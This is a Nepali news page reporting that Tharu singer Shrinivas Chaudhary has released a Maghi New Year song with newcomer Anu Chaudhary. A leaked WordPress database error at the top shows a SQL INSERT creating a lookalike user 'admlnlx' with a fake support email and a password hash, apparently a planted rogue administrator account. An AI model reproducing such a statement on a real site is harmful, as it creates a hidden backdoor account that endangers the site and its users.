WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bc95CHP4MXAtFWI.BHvG8CZAxaP9EB0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 08:59:43', '', 'admlnlx', 'admlnlx')
चितवन, पुस ११–
थारु समुदायबाट लोकप्रिय बनेका गायक तथा सञ्चारकर्मी श्रीनिवास चौधरीले थारु नयाँ वर्ष माघीको नयाँ गीत ल्याएका छन्। आदिबासी थारु हमरे धर्तिपुत्र तराईकेलगायत चर्चित दुई सय पचासभन्दा बढी थारु नेपाली भोजपुरी गीत गाएका उनले ‘आइल रे आइल माघी’ बोलको गीत बजारमा ल्याएका हुन् ।
अहिले अडियो मात्र सार्वजनिक सो गीतको अब छिट्टै भिडियो समेत निकालिने गायक श्रीनिवास चौधरीले जानकारी दिनुभयो । थारु जनकबि बमबहादुर चौधरीको शब्द, विकास चौधरीको संगीत, महाराजा थापाको संगीत संयोजन रहेको गीतमा गायक श्रीनिवासलाई नवगायिका अनु चौधरीले साथ दिएकी छन्। गीतमा नवगायिका अनु चौधरीको स्वरलाई बिलउडकी ख्यातीप्राप्त गायिका अल्का याज्ञनिकसँग तुलना गरिएको गायक श्रीनिवासले जानकारी दिए।
उनको स्वरले प्रभावित भएर आफूले पनि कुमार सानुको स्वर दिएको उनले बताए।